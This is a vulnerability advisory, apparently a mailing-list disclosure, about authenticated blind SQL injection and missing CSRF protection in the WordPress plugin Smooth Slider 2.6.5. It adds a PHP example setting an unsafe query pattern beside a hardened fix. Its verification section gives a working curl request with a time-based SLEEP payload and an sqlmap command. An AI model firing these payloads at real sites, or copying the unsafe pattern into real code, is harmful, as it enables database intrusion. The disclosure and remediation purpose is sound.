Subject: Blind SQL injection in Smooth Slider 2.6.5
Date: Wed, 15 Jul 2015 21:20:53 +0200

Hello,

Plugin: Smooth Slider 2.6.5 https://wordpress.org/plugins/smooth-slider/

Authenticated administrators can execute arbitrary SQL commands, and the affected form has no CSRF protection, so an administrator's session can also be made to submit the request.

1. SQL injection (smooth_slider_create_multiple_sliders())

Method: POST
URL: http://localhost/wp-admin/admin.php?page=smooth-slider-admin
Vulnerable parameter: current_slider_id

Example PHP call stack:

smooth_slider_create_multiple_sliders   [/smooth-slider/settings/sliders.php:77]
wpdb::query
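
The pattern behind this finding, and how a plugin author would close it, as an added example. This is not the Smooth Slider plugin's code: it reconstructs the general shape the advisory describes (a POST integer reaching wpdb::query through string concatenation) and places the hardened form beside it. The function, nonce, option and table names are assumptions; the WordPress API calls (`current_user_can`, `check_admin_referer`, `wp_nonce_field`, `absint`, `sanitize_text_field`, `wp_unslash`, `$wpdb->prepare`) are real.

```php
<?php
// Added illustrative example; NOT the Smooth Slider plugin's actual code.
// Function names, the nonce action and the table name are assumptions.

// --- Vulnerable pattern (assumed) ------------------------------------------
function example_rename_slider_unsafe() {
    global $wpdb;
    $table = $wpdb->prefix . 'example_sliders';            // assumed table name

    $slider_id = $_POST['current_slider_id'];              // untrusted, unvalidated
    $new_name  = $_POST['rename_slider_to'];

    // Concatenation: a value such as "-1 or (SELECT ...)" in current_slider_id
    // becomes part of the statement, which is exactly what a time-based blind
    // probe (SLEEP) reveals. No capability check and no nonce either.
    $wpdb->query( "UPDATE $table SET slider_name = '$new_name' WHERE id = $slider_id" );
}

// --- Hardened form -----------------------------------------------------------
function example_rename_slider_safe() {
    global $wpdb;
    $table = $wpdb->prefix . 'example_sliders';            // assumed table name

    // 1. Authorisation: only users allowed to manage options may rename sliders.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }

    // 2. CSRF: the form must carry a nonce and the handler must verify it.
    //    check_admin_referer() stops the request on a missing or invalid nonce.
    check_admin_referer( 'example_rename_slider', 'example_rename_slider_nonce' );

    // 3. Input validation: the id is an integer, so coerce it to one and reject 0.
    $slider_id = absint( $_POST['current_slider_id'] ?? 0 );
    if ( 0 === $slider_id ) {
        wp_die( 'Invalid slider id.' );
    }
    $new_name = sanitize_text_field( wp_unslash( $_POST['rename_slider_to'] ?? '' ) );

    // 4. Parameterised query: wpdb::prepare() escapes %s and emits %d as an
    //    integer, so the id can never be interpreted as SQL.
    $wpdb->query(
        $wpdb->prepare(
            "UPDATE {$table} SET slider_name = %s WHERE id = %d",
            $new_name,
            $slider_id
        )
    );
}

// In the form template, the matching field that step 2 checks (assumed names):
//   wp_nonce_field( 'example_rename_slider', 'example_rename_slider_nonce' );
```

Steps 1 and 2 address the "no CSRF protection" half of the report, steps 3 and 4 the injection itself; either of 3 or 4 alone would already defeat the `-1 or (SELECT ...)` payload shown below, but keeping both means a later change to the query cannot silently reintroduce the bug. On the detection side, the time-based payloads in the verification section leave a distinctive trace: `SLEEP(` inside an `UPDATE` in the MySQL general or slow query log is never legitimate for this kind of admin action.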

Verification:

curl --cookie "..." --data "rename_slider=Rename&rename_slider_to=x&current_slider_id=-1 or (SELECT * FROM (SELECT SLEEP(5))X)" http://localhost/wp-admin/admin.php?page=smooth-slider-admin

or:

sqlmap --cookie "..." --data "rename_slider=Rename&rename_slider_to=x&current_slider_id=-1" -p current_slider_id --dbms mysql -u http://localhost/wp-admin/admin.php?page=smooth-slider-admin

...
Parameter: current_slider_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: rename_slider=Rename&rename_slider_to=x&current_slider_id=-1 AND (SELECT * FROM (SELECT(SLEEP(5)))lpBu)
...

--
Regards,
Marcin Probola,